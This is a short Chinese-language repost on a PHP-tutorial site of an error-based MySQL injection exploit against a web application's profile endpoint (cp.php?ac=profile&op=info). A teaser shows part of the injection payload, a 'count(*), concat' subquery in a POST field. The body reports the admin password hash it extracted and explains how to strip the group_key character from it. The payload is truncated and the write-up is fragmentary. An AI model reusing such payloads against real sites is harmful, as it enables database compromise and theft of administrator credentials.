来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash向cp.php?ac=profileop=info POST提交参数:profilesubmit=1formhash=232d1c54info[a#39;,(select 1 from(select count(*),conca......
通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash
向cp.php?ac=profile&op=info POST提交参数:
得到Admin的hash是6ad9ab1e6a74f51b57079c97329d208c,最后一位是group_key,去掉最后一位1,最后一位是group_key.
from:RAyh4c的黑盒子
mysql暴错注入的科普 1 http://www.2cto.com/Article/201108/100722.html |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com